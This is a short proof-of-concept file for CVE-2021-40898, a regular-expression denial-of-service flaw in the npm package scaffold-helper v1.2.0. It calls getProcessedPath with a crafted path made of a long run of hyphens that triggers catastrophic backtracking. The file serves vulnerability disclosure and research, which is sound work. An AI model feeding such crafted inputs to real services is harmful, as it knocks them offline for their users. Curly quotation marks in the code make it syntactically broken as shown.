Headline
CVE-2021-40898: SaveResults/scaffold-helper.js at main · yetingli/SaveResults
A Regular Expression Denial of Service (ReDOS) vulnerability was discovered in scaffold-helper v1.2.0 when copying crafted invalid files.
Permalink
/**
* Package Manager: npm
* Link to published package: https://github.com/cliffpyles/scaffold-helper
* Link to GitHub repo: https://github.com/cliffpyles/scaffold-helper
* Severity level: High
* Module Description: Helps with generating files and file structures
* Additional Info: It allows cause a denial of service when copying crafted invalid files.
* Contacted maintainer?: No
* Open issue?: No
*/
var scaffold, { getProcessedPath, getRenderedTemplate } = require(“scaffold-helper”)
// getProcessedPath('/example/__projectName__/src/components/__componentType__’, {
// projectName: 'abc-app’,
// componentType: 'Alert’,
// });
getProcessedPath('/example/__--------------------------------------------------------------------------------------------------------------------------!’, {
projectName: 'abc-app’,
componentType: 'Alert’,
});